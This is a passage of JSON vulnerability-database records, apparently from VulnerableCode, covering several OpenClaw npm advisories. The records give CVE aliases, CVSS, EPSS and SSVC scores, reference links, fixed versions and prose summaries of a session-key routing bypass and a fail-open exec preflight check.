                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41352",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41352"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xj9w-5r6q-x6v4",
                    "reference_id": "GHSA-xj9w-5r6q-x6v4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xj9w-5r6q-x6v4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41352",
                "GHSA-xj9w-5r6q-x6v4"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xzg5-ren5-p7gw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89941?format=api",
            "vulnerability_id": "VCID-y65g-4baa-a7c2",
            "summary": "OpenClaw: Hook mapping templates could bypass hook session-key opt-in\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nTemplated hook mapping `sessionKey` values were treated differently from request-supplied session keys. A hook mapping could render an externally influenced session key even when `hooks.allowRequestSessionKey` was disabled, bypassing the intended routing opt-in for hook callers.\n\nThis affects webhook routing isolation. It does not grant host execution by itself. Severity is medium.\n\n## Fix\n\nTemplate-rendered mapping session keys are now treated as externally supplied routing input and require `hooks.allowRequestSessionKey=true` plus the existing prefix policy checks.\n\nFix commit:\n\n- `5275d008ed33203dba3f98e969ad683a65c416c3`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45002",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10694",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10682",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10719",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45002"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45002",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45002"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2xcp-x87w-q377",
                    "reference_id": "GHSA-2xcp-x87w-q377",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2xcp-x87w-q377"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-45002",
                "GHSA-2xcp-x87w-q377"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y65g-4baa-a7c2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89035?format=api",
            "vulnerability_id": "VCID-y7sd-j9xn-qffs",
            "summary": "OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n## Summary\n\nBefore OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely.\n\n## Impact\n\nAn attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34425",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06326",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0631",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06316",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34425"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fvx6-pj3r-5q4q",
                    "reference_id": "GHSA-fvx6-pj3r-5q4q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fvx6-pj3r-5q4q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
